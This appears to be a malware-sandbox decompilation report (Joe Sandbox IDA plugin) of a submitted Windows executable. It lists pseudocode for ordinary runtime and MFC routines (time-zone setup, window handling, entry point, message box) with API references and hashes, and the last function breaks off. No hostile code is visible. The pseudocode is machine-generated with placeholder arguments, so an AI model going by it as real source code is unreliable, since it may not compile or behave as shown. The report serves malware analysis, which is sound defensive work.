Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: 59ce7e949d72d20d3b0e1046ee7cd880fa8c9e45b96b8167ce34cd237f8108ea
Instruction ID: 073ddf0fe74a93c2ca18b2cdbf6cccc684bfe4d9908968ef648256188d18c8f8
Opcode Fuzzy Hash: 59ce7e949d72d20d3b0e1046ee7cd880fa8c9e45b96b8167ce34cd237f8108ea
Instruction Fuzzy Hash: AE017C31201119BBDB21AB649C08EEF776CEF54710F804531F911D51A0E734D963CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040A586, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 207
timeCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040A586() {
				int _v8;
				char* _v12;
				void* __ecx;
				char* _t18;
				intOrPtr _t19;
				intOrPtr _t23;
				char* _t27;
				char _t29;
				char _t30;
				signed int _t32;
				char _t34;
				void* _t35;
				char _t36;
				void* _t37;
				signed int _t39;
				signed int _t40;
				char* _t43;
				char* _t46;
				intOrPtr _t47;
				void* _t56;
				signed int _t60;
				signed int _t63;
				signed int _t65;
				signed int _t67;
				intOrPtr _t68;
				void* _t69;
				void* _t70;
				char* _t74;
				char* _t76;
				signed int** _t80;
				intOrPtr _t86;
				intOrPtr _t88;

				_push(_t55);
				_t70 = 0xc;
				_v12 = 0;
				E004079D4(_t70);
				 *0x4373d8 =  *0x4373d8 | 0xffffffff;
				 *0x4373c8 =  *0x4373c8 | 0xffffffff;
				 *0x439f08 = 0;
				 *_t80 = 0x42f6a8;
				_t74 = E0040B475();
				_t56 = _t69;
				if(_t74 != 0) {
					if( *_t74 == 0) {
						L41:
						_t18 = E00407A35(_t70);
					} else {
						_t19 =  *0x439fbc; // 0x0
						if(_t19 == 0) {
							L18:
							E004062E0( *0x439fbc);
							_t23 = E00405667(E00405A40(_t74) + 1);
							 *0x439fbc = _t23;
							if(_t23 == 0) {
								goto L41;
							} else {
								E00409B00(_t23, _t74);
								E00407A35(_t70);
								E0040AD30( *0x4373bc, _t74, 3);
								_t27 =  *0x4373bc; // 0x43733c
								_t76 = _t74 + 3;
								_t27[3] = _t27[3] & 0x00000000;
								if( *_t76 == 0x2d) {
									_v12 = 1;
									_t76 = _t76 + 1;
								}
								_t60 = E004068F6(_t56, _t76) * 0xe10;
								 *0x437330 = _t60;
								while(1) {
									_t29 =  *_t76;
									if(_t29 != 0x2b && (_t29 < 0x30 || _t29 > 0x39)) {
										break;
									}
									_t76 = _t76 + 1;
								}
								if( *_t76 == 0x3a) {
									_t76 = _t76 + 1;
									_t32 = E004068F6(_t60, _t76);
									_t63 =  *0x437330; // 0x7080
									_t60 = _t63 + _t32 * 0x3c;
									 *0x437330 = _t60;
									while(1) {
										_t34 =  *_t76;
										if(_t34 < 0x30 || _t34 > 0x39) {
											break;
										}
										_t76 = _t76 + 1;
									}
									if( *_t76 == 0x3a) {
										_t76 = _t76 + 1;
										_t35 = E004068F6(_t60, _t76);
										_t65 =  *0x437330; // 0x7080
										_t60 = _t65 + _t35;
										 *0x437330 = _t60;
										while(1) {
											_t36 =  *_t76;
											if(_t36 < 0x30 || _t36 > 0x39) {
												goto L36;
											}
											_t76 = _t76 + 1;
										}
									}
								}
								L36:
								if(_v12 != 0) {
									 *0x437330 =  ~_t60;
								}
								_t30 =  *_t76;
								 *0x437334 = _t30;
								if(_t30 == 0) {
									goto L40;
								} else {
									E0040AD30( *0x4373c0, _t76, 3);
									_t18 =  *0x4373c0; // 0x43737c
									_t18[3] = _t18[3] & 0x00000000;
								}
							}
						} else {
							_t37 = E00409A70(_t74, _t19);
							_pop(_t56);
							if(_t37 == 0) {
								goto L41;
							} else {
								goto L18;
							}
						}
					}
				} else {
					E00407A35(_t70);
					 *_t80 = 0x439f10;
					_t18 = GetTimeZoneInformation(??);
					if(_t18 != 0xffffffff) {
						_t39 =  *0x439f10; // 0x0
						_t67 =  *0x439f64; // 0x0
						_t40 = _t39 * 0x3c;
						_t86 =  *0x439f56; // 0x0
						_t68 = 1;
						 *0x437330 = _t40;
						 *0x439f08 = _t68;
						if(_t86 != 0) {
							 *0x437330 = _t40 + _t67 * 0x3c;
						}
						_t88 =  *0x439faa; // 0x0
						if(_t88 == 0) {
							L7:
							 *0x437334 = 0;
							 *0x437338 = 0;
						} else {
							_t47 =  *0x439fb8; // 0x0
							if(_t47 == 0) {
								goto L7;
							} else {
								 *0x437334 = _t68;
								 *0x437338 = (_t47 - _t67) * 0x3c;
							}
						}
						if(WideCharToMultiByte( *0x439efc, 0x220, 0x439f14, 0xffffffff,  *0x4373bc, 0x3f, 0,  &_v8) == 0 || _v8 != 0) {
							_t43 =  *0x4373bc; // 0x43733c
							 *_t43 =  *_t43 & 0x00000000;
						} else {
							_t46 =  *0x4373bc; // 0x43733c
							_t46[0x3f] = _t46[0x3f] & 0x00000000;
						}
						if(WideCharToMultiByte( *0x439efc, 0x220, 0x439f68, 0xffffffff,  *0x4373c0, 0x3f, 0,  &_v8) == 0 || _v8 != 0) {
							L40:
							_t18 =  *0x4373c0; // 0x43737c
							 *_t18 =  *_t18 & 0x00000000;
						} else {
							_t18 =  *0x4373c0; // 0x43737c
							_t18[0x3f] = _t18[0x3f] & 0x00000000;
						}
					}
				}
				return _t18;
			}

0x0040a58a
0x0040a590
0x0040a594
0x0040a597
0x0040a59c
0x0040a5a3
0x0040a5aa
0x0040a5b0
0x0040a5bc
0x0040a5be
0x0040a5c1
0x0040a6c7
0x0040a801
0x0040a802
0x0040a6cd
0x0040a6cd
0x0040a6d4
0x0040a6e7
0x0040a6ed
0x0040a6fa
0x0040a704
0x0040a709
0x00000000
0x0040a70f
0x0040a711
0x0040a717
0x0040a725
0x0040a72a
0x0040a72f
0x0040a735
0x0040a73c
0x0040a73e
0x0040a745
0x0040a745
0x0040a751
0x0040a757
0x0040a75d
0x0040a75d
0x0040a761
0x00000000
0x00000000
0x0040a76b
0x0040a76b
0x0040a771
0x0040a773
0x0040a775
0x0040a77e
0x0040a784
0x0040a786
0x0040a78c
0x0040a78c
0x0040a790
0x00000000
0x00000000
0x0040a796
0x0040a796
0x0040a79c
0x0040a79e
0x0040a7a0
0x0040a7a6
0x0040a7ac
0x0040a7ae
0x0040a7b4
0x0040a7b4
0x0040a7b8
0x00000000
0x00000000
0x0040a7be
0x0040a7be
0x0040a7b4
0x0040a79c
0x0040a7c1
0x0040a7c5
0x0040a7c9
0x0040a7c9
0x0040a7cf
0x0040a7d4
0x0040a7d9
0x00000000
0x0040a7db
0x0040a7e4
0x0040a7e9
0x0040a7f1
0x0040a7f1
0x0040a7d9
0x0040a6d6
0x0040a6d8
0x0040a6e0
0x0040a6e1
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a6e1
0x0040a6d4
0x0040a5c7
0x0040a5c8
0x0040a5cd
0x0040a5d4
0x0040a5dd
0x0040a5e3
0x0040a5e8
0x0040a5ee
0x0040a5f1
0x0040a5fa
0x0040a5fb
0x0040a600
0x0040a606
0x0040a60f
0x0040a60f
0x0040a614
0x0040a61b
0x0040a638
0x0040a638
0x0040a63e
0x0040a61d
0x0040a61d
0x0040a624
0x00000000
0x0040a626
0x0040a628
0x0040a631
0x0040a631
0x0040a624
0x0040a66e
0x0040a680
0x0040a685
0x0040a675
0x0040a675
0x0040a67a
0x0040a67a
0x0040a6a7
0x0040a7f7
0x0040a7f7
0x0040a7fc
0x0040a6b6
0x0040a6b6
0x0040a6bb
0x0040a6bb
0x0040a6a7
0x0040a5dd
0x0040a80c

APIs

Part of subcall function 004079D4: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,00407369,00000009,?,?,?,00408E0B,00000001,00000074,?,004063F8), ref: 00407A11
Part of subcall function 004079D4: EnterCriticalSection.KERNEL32(?,?,?,00407369,00000009,?,?,?,00408E0B,00000001,00000074,?,004063F8), ref: 00407A2C

Part of subcall function 00407A35: LeaveCriticalSection.KERNEL32(?,004056C9,00000009,?,00000009,00000000,?,00405689,000000E0,00405676,?,004079F4,00000018,00000000,?), ref: 00407A42

GetTimeZoneInformation.KERNEL32(0000000C,?,00000000,-0000076C,0000000B,0000000B,?,0040A577,00408FB5,?,?,?,?,004062D2,?,?), ref: 0040A5D4
WideCharToMultiByte.KERNEL32(00000220,00439F14,000000FF,0000003F,00000000,?,?,0040A577,00408FB5,?,?,?,?,004062D2,?,?), ref: 0040A66A
WideCharToMultiByte.KERNEL32(00000220,00439F68,000000FF,0000003F,00000000,?,?,0040A577,00408FB5,?,?,?,?,004062D2,?,?), ref: 0040A6A3

Strings

<sC, xrefs: 0040A675, 0040A680, 0040A72A
|sC, xrefs: 0040A6B6, 0040A7E9, 0040A7F7

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CriticalSection$ByteCharMultiWide$EnterInformationInitializeLeaveTimeZone
String ID: <sC$|sC
API String ID: 3442286286-4181122796
Opcode ID: 95382b0c2674745cc3224bc5266e28e0c8a256173c61d84ba7f422d0d13868bb
Instruction ID: b677b28e1722a814c3f057f402e4873ea4966b7f4bec670f8581aa156dfe752d
Opcode Fuzzy Hash: 95382b0c2674745cc3224bc5266e28e0c8a256173c61d84ba7f422d0d13868bb
Instruction Fuzzy Hash: BC61D7B15083409AD7319F29AC85B6A3BA9E701314F24613FFCC1A72E1D7788D62D75E

Uniqueness

Uniqueness Score: -1.00%

Function 00413E4C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00413E4C(intOrPtr* __ecx) {
				struct HWND__* _v36;
				struct HWND__* _v40;
				signed char _v44;
				void* _v48;
				long _t33;
				long _t41;
				struct HWND__* _t46;
				signed char _t58;
				intOrPtr* _t61;
				signed int _t62;
				void* _t67;
				intOrPtr _t69;
				intOrPtr* _t70;

				_t70 = __ecx;
				_t67 = E004126FB();
				if(_t67 != 0) {
					if( *((intOrPtr*)(_t67 + 0x1c)) == __ecx) {
						 *((intOrPtr*)(_t67 + 0x1c)) = 0;
					}
					if( *((intOrPtr*)(_t67 + 0x20)) == _t70) {
						 *((intOrPtr*)(_t67 + 0x20)) = 0;
					}
				}
				_t61 =  *((intOrPtr*)(_t70 + 0x30));
				if(_t61 != 0) {
					 *((intOrPtr*)( *_t61 + 0x50))();
					 *((intOrPtr*)(_t70 + 0x30)) = 0;
				}
				_t62 =  *(_t70 + 0x34);
				_t58 = 1;
				if(_t62 != 0) {
					 *((intOrPtr*)( *_t62 + 4))(_t58);
				}
				 *(_t70 + 0x34) =  *(_t70 + 0x34) & 0x00000000;
				if(( *(_t70 + 0x24) & _t58) != 0) {
					_t69 =  *((intOrPtr*)(E004249C4() + 0xcc));
					if(_t69 != 0 &&  *(_t69 + 0x1c) != 0) {
						E00406330( &_v48, 0, 0x2c);
						_t46 =  *(_t70 + 0x1c);
						_v40 = _t46;
						_v36 = _t46;
						_v48 = 0x28;
						_v44 = _t58;
						SendMessageA( *(_t69 + 0x1c), 0x405, 0,  &_v48);
					}
				}
				_t33 = GetWindowLongA( *(_t70 + 0x1c), 0xfffffffc);
				E004136A7(_t70);
				if(GetWindowLongA( *(_t70 + 0x1c), 0xfffffffc) == _t33) {
					_t41 =  *( *((intOrPtr*)( *_t70 + 0x80))());
					if(_t41 != 0) {
						SetWindowLongA( *(_t70 + 0x1c), 0xfffffffc, _t41);
					}
				}
				E004137BE(_t70);
				return  *((intOrPtr*)( *_t70 + 0xa4))();
			}

0x00413e55
0x00413e5c
0x00413e62
0x00413e67
0x00413e8c
0x00413e8c
0x00413e92
0x00413e94
0x00413e94
0x00413e92
0x00413e97
0x00413e9c
0x00413ea0
0x00413ea3
0x00413ea3
0x00413ea6
0x00413ead
0x00413eae
0x00413eb3
0x00413eb3
0x00413eb6
0x00413ebd
0x00413ec4
0x00413ecc
0x00413edc
0x00413ee1
0x00413ee7
0x00413eea
0x00413ef0
0x00413eff
0x00413f05
0x00413f05
0x00413ecc
0x00413f16
0x00413f1c
0x00413f2a
0x00413f36
0x00413f3a
0x00413f42
0x00413f42
0x00413f3a
0x00413f4a
0x00413f5d

APIs

SendMessageA.USER32 ref: 00413F05
GetWindowLongA.USER32 ref: 00413F16
GetWindowLongA.USER32 ref: 00413F26
SetWindowLongA.USER32 ref: 00413F42

Strings

(, xrefs: 00413EF0

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID: (
API String ID: 2178440468-3887548279
Opcode ID: b7860b0334c69e628a48f58358d5d69417b13256e34788ada7969d26880b0dcf
Instruction ID: dd2e24bc71a940e73787925e98583bd3eaf246f1b6150e13293b1a1c05b6b2eb
Opcode Fuzzy Hash: b7860b0334c69e628a48f58358d5d69417b13256e34788ada7969d26880b0dcf
Instruction Fuzzy Hash: 3131C1306003109FDB20AF69D884BAEBBB4BF44315F10416EE54297791DB79ED85CF98

Uniqueness

Uniqueness Score: -1.00%

Function 004264D7, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 88
stringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E004264D7(void* __ecx, void* __eflags) {
				CHAR* _v8;
				char _v268;
				char _v528;
				char _v784;
				void* __ebp;
				signed char* _t35;
				intOrPtr _t39;
				intOrPtr _t43;
				CHAR* _t54;
				void* _t62;
				intOrPtr* _t63;
				void* _t64;

				_t55 = __ecx;
				_t64 = __ecx;
				_t62 = E00424BFB();
				 *(_t62 + 8) =  *(_t64 + 0x68);
				 *(_t62 + 0xc) =  *(_t64 + 0x68);
				GetModuleFileNameA( *(_t64 + 0x68),  &_v528, 0x104);
				_t35 = E004072C1(_t55,  &_v528, 0x2e);
				 *_t35 =  *_t35 & 0x00000000;
				_v8 = _t35;
				E004265F4( &_v528,  &_v268, 0x104);
				if( *((intOrPtr*)(_t64 + 0x88)) == 0) {
					 *((intOrPtr*)(_t64 + 0x88)) = E004065EE( &_v268);
				}
				if( *((intOrPtr*)(_t64 + 0x78)) == 0) {
					if(E00417298(0xe000,  &_v784, 0x100) == 0) {
						_push( *((intOrPtr*)(_t64 + 0x88)));
					} else {
						_push( &_v784);
					}
					 *((intOrPtr*)(_t64 + 0x78)) = E004065EE();
				}
				_t39 =  *((intOrPtr*)(_t64 + 0x78));
				 *((intOrPtr*)(_t62 + 0x10)) = _t39;
				_t63 = _t64 + 0x8c;
				if( *((intOrPtr*)(_t64 + 0x8c)) == 0) {
					_t54 = _v8;
					lstrcpyA(_t54, ".HLP");
					_t39 = E004065EE( &_v528);
					 *_t63 = _t39;
					 *_t54 =  *_t54 & 0x00000000;
				}
				if( *((intOrPtr*)(_t64 + 0x90)) == 0) {
					lstrcatA( &_v268, ".INI");
					_t43 = E004065EE( &_v268);
					 *((intOrPtr*)(_t64 + 0x90)) = _t43;
					return _t43;
				}
				return _t39;
			}

0x004264d7
0x004264e3
0x004264ea
0x004264f4
0x004264fa
0x00426508
0x00426517
0x0042651c
0x00426521
0x00426533
0x00426540
0x0042654f
0x0042654f
0x00426558
0x00426572
0x0042657d
0x00426574
0x0042657a
0x0042657a
0x00426589
0x00426589
0x0042658c
0x0042658f
0x00426598
0x0042659e
0x004265a0
0x004265a9
0x004265b6
0x004265bb
0x004265bd
0x004265c0
0x004265c8
0x004265d6
0x004265e3
0x004265e9
0x00000000
0x004265e9
0x004265f3

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 00426508

Part of subcall function 004265F4: lstrlenA.KERNEL32(00000104,00000000,?,00426538), ref: 0042662B

lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 004265A9
lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 004265D6

Strings

.INI, xrefs: 004265D0
.HLP, xrefs: 004265A3

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: FileModuleNamelstrcatlstrcpylstrlen
String ID: .HLP$.INI
API String ID: 2421895198-3011182340
Opcode ID: 03e9000f74707ee1fefe1168fab3d886596b8c1f978c46023b90c1e0bddbb18a
Instruction ID: 868c022bf07a7b2e93be295e1be440ce3fbd708987d9fcb65685db64fa447996
Opcode Fuzzy Hash: 03e9000f74707ee1fefe1168fab3d886596b8c1f978c46023b90c1e0bddbb18a
Instruction Fuzzy Hash: 31316071904718AFDB21DB75EC85B86B7FCAB04304F5049ABE18AD3141DB74AAC4CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA5F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041BA5F(intOrPtr __ecx, void* __eflags, CHAR* _a4, int _a8, intOrPtr _a12) {
				struct HWND__* _v8;
				int _v12;
				struct HWND__* _v16;
				intOrPtr _v20;
				char _v280;
				struct HWND__* _t23;
				signed int _t32;
				intOrPtr _t34;
				long _t36;
				int _t38;
				intOrPtr _t41;
				CHAR* _t42;
				int _t43;
				long _t44;

				_t41 = __ecx;
				_v20 = __ecx;
				E0041BA31(0);
				_t23 = E0041BBD7(0,  &_v8);
				_t44 = 0;
				_v16 = _t23;
				if(_t23 == 0) {
					L3:
					if(_t41 != 0) {
						_t5 = _t41 + 0x9c; // 0x9c
						_t44 = _t5;
					}
					L5:
					_v12 = 0;
					if(_t44 != 0) {
						_v12 =  *_t44;
						_t34 = _a12;
						if(_t34 != 0) {
							 *_t44 = _t34 + 0x30000;
						}
					}
					_t38 = _a8;
					if((_t38 & 0x000000f0) == 0) {
						_t32 = _t38 & 0x0000000f;
						if(_t32 <= 1 || _t32 > 2 && _t32 <= 4) {
							_t38 = _t38 | 0x00000030;
						}
					}
					if(_t41 == 0) {
						_t42 =  &_v280;
						GetModuleFileNameA(0,  &_v280, 0x104);
					} else {
						_t42 =  *(_t41 + 0x78);
					}
					_t43 = MessageBoxA(_v16, _a4, _t42, _t38);
					if(_t44 != 0) {
						 *_t44 = _v12;
					}
					if(_v8 != 0) {
						EnableWindow(_v8, 1);
					}
					E0041BA31(1);
					return _t43;
				}
				_t36 = SendMessageA(_v8, 0x376, 0, 0);
				if(_t36 == 0) {
					goto L3;
				} else {
					_t44 = _t36;
					goto L5;
				}
			}

0x0041ba6d
0x0041ba70
0x0041ba73
0x0041ba7d
0x0041ba82
0x0041ba86
0x0041ba89
0x0041baa3
0x0041baa5
0x0041baa7
0x0041baa7
0x0041baa7
0x0041baad
0x0041baaf
0x0041bab2
0x0041bab6
0x0041bab9
0x0041babe
0x0041bac5
0x0041bac5
0x0041babe
0x0041bac7
0x0041bacd
0x0041bad1
0x0041bad7
0x0041bae3
0x0041bae3
0x0041bad7
0x0041bae8
0x0041bafd
0x0041bb03
0x0041baea
0x0041baea
0x0041baea
0x0041bb19
0x0041bb1b
0x0041bb20
0x0041bb20
0x0041bb26
0x0041bb2d
0x0041bb2d
0x0041bb38
0x0041bb43
0x0041bb43
0x0041ba95
0x0041ba9d
0x00000000
0x0041ba9f
0x0041ba9f
0x00000000
0x0041ba9f

APIs

Part of subcall function 0041BBD7: GetParent.USER32(?), ref: 0041BC0A
Part of subcall function 0041BBD7: GetLastActivePopup.USER32(?), ref: 0041BC19
Part of subcall function 0041BBD7: IsWindowEnabled.USER32(?), ref: 0041BC2E
Part of subcall function 0041BBD7: EnableWindow.USER32(?,00000000), ref: 0041BC41

SendMessageA.USER32 ref: 0041BA95
GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 0041BB03
MessageBoxA.USER32 ref: 0041BB11
EnableWindow.USER32(00000000,00000001), ref: 0041BB2D

Strings

]hA, xrefs: 0041BA5F

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$EnableMessage$ActiveEnabledFileLastModuleNameParentPopupSend
String ID: ]hA
API String ID: 1958756768-937096280
Opcode ID: 7e6bfb6863a4bed41eb605bf4d3f71dc2d46af30f455a0b67583cfc665ecc676
Instruction ID: 4165363e149cbbf7c392989b56a322b27346b80c9b900e92cfd844e3d8e78dc3
Opcode Fuzzy Hash: 7e6bfb6863a4bed41eb605bf4d3f71dc2d46af30f455a0b67583cfc665ecc676
Instruction Fuzzy Hash: E1217E72A00208AFDB209FA5CCC1BEEB7B9EF44784F54046AE654E7250D7799D81CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 00406388, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 83%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				unsigned int _t15;
				signed int _t27;
				signed int _t35;
				intOrPtr _t52;

				_t47 = __edi;
				_push(0xffffffff);
				_push(0x42f100);
				_push(E00409800);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t52;
				_push(__edi);
				_v28 = _t52 - 0x58;
				_t15 = GetVersion();
				 *0x439d04 = 0;
				_t35 = _t15 & 0x000000ff;
				 *0x439d00 = _t35;
				 *0x439cfc = _t35 << 8;
				 *0x439cf8 = _t15 >> 0x10;
				if(E0040796F(1) == 0) {
					E004064B5(0x1c);
				}
				if(E00408DEC() == 0) {
					E004064B5(0x10);
				}
				_v8 = 0;
				E0040963B();
				 *0x43b87c = GetCommandLineA();
				 *0x439ce8 = E00409509();
				E004092BC();
				E00409203();
				E00406619();
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				_v104 = E004091AB();
				_t56 = _v96.dwFlags & 0x00000001;
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t27 = 0xa;
				} else {
					_t27 = _v96.wShowWindow & 0x0000ffff;
				}
				_v100 = E0040EC99(GetModuleHandleA(0), 0, _v104, _t27);
				E00406646(_t29);
				_t31 = _v24;
				_t40 =  *((intOrPtr*)( *_v24));
				_v108 =  *((intOrPtr*)( *_v24));
				return E00409033(_t47, _t56, _t40, _t31);
			}

0x00406388
0x0040638b
0x0040638d
0x00406392
0x0040639d
0x0040639e
0x004063aa
0x004063ab
0x004063ae
0x004063b8
0x004063c0
0x004063c6
0x004063d1
0x004063da
0x004063e9
0x004063ed
0x004063f2
0x004063fa
0x004063fe
0x00406403
0x00406406
0x00406409
0x00406414
0x0040641e
0x00406423
0x00406428
0x0040642d
0x00406432
0x00406439
0x00406444
0x00406447
0x0040644b
0x00406455
0x0040644d
0x0040644d
0x0040644d
0x00406468
0x0040646c
0x00406471
0x00406476
0x00406478
0x00406484

APIs

GetVersion.KERNEL32 ref: 004063AE

Part of subcall function 0040796F: HeapCreate.KERNELBASE(00000000,00001000,00000000,004063E6,00000001), ref: 00407980
Part of subcall function 0040796F: HeapDestroy.KERNEL32 ref: 0040799E

GetCommandLineA.KERNEL32 ref: 0040640E
GetStartupInfoA.KERNEL32(?), ref: 00406439
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0040645C

Part of subcall function 004064B5: ExitProcess.KERNEL32 ref: 004064D2

Strings

83J, xrefs: 00406414

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
String ID: 83J
API String ID: 2057626494-3076235396
Opcode ID: 8203cef856ffdf5330fa23f021acb3231cccc4167ef851cc0875824ae4c609d5
Instruction ID: c51f859c3b4423f550283f3a037e6d2f417254e4b3c57e688e880ffcfc58db2c
Opcode Fuzzy Hash: 8203cef856ffdf5330fa23f021acb3231cccc4167ef851cc0875824ae4c609d5
Instruction Fuzzy Hash: 952174B1940715AAD718AFB6EC46A6D7BB8EF44704F10453FF902AA2D2DB7C4811CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 004219DB, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004219DB(intOrPtr* __ecx, int _a4, signed int _a8, intOrPtr _a12) {
				void* __ebp;
				void* _t29;
				int _t30;
				void* _t35;
				void* _t38;
				intOrPtr* _t40;
				int _t42;
				intOrPtr* _t45;
				void* _t46;

				_t45 = __ecx;
				_t29 = E00414DCC(__ecx);
				_t40 =  *((intOrPtr*)(_t45 + 0x68));
				_t42 = _a4;
				_t38 = _t29;
				if(_t40 == 0) {
					L2:
					if(_a8 != 0xffff) {
						if(_t42 == 0 || (_a8 & 0x00000810) != 0) {
							 *(_t45 + 0x90) =  *(_t45 + 0x90) & 0x00000000;
							goto L17;
						} else {
							if(_t42 < 0xf000 || _t42 >= 0xf1f0) {
								if(_t42 < 0xff00) {
									goto L13;
								}
								 *(_t45 + 0x90) = 0xef1f;
								goto L17;
							} else {
								_t42 = (_t42 + 0xffff1000 >> 4) + 0xef00;
								L13:
								 *(_t45 + 0x90) = _t42;
								L17:
								 *(_t38 + 0x24) =  *(_t38 + 0x24) | 0x00000040;
								L18:
								_t30 =  *(_t45 + 0x90);
								if(_t30 ==  *((intOrPtr*)(_t45 + 0x94))) {
									L21:
									return _t30;
								}
								_t30 = E00413740(_t46, GetParent( *(_t45 + 0x1c)));
								if(_t30 == 0) {
									goto L21;
								}
								return PostMessageA( *(_t45 + 0x1c), 0x36a, 0, 0);
							}
						}
					}
					 *(_t45 + 0x24) =  *(_t45 + 0x24) & 0xffffffbf;
					if( *((intOrPtr*)(_t38 + 0x50)) != 0) {
						 *(_t45 + 0x90) = 0xe002;
					} else {
						 *(_t45 + 0x90) = 0xe001;
					}
					SendMessageA( *(_t45 + 0x1c), 0x362,  *(_t45 + 0x90), 0);
					_t35 =  *((intOrPtr*)( *_t45 + 0xd4))();
					if(_t35 != 0) {
						UpdateWindow( *(_t35 + 0x1c));
					}
					goto L18;
				}
				_t30 =  *((intOrPtr*)( *_t40 + 0x7c))(_t42, _a8, _a12);
				if(_t30 != 0) {
					goto L21;
				}
				goto L2;
			}

0x004219e1
0x004219e3
0x004219e8
0x004219eb
0x004219f0
0x004219f2
0x00421a08
0x00421a0f
0x00421a62
0x00421aa7
0x00000000
0x00421a6c
0x00421a72
0x00421a99
0x00000000
0x00000000
0x00421a9b
0x00000000
0x00421a7c
0x00421a85
0x00421a8b
0x00421a8b
0x00421aae
0x00421aae
0x00421ab2
0x00421ab2
0x00421abe
0x00421ae9
0x00421ae9
0x00421ae9
0x00421aca
0x00421ad1
0x00000000
0x00000000
0x00000000
0x00421adf
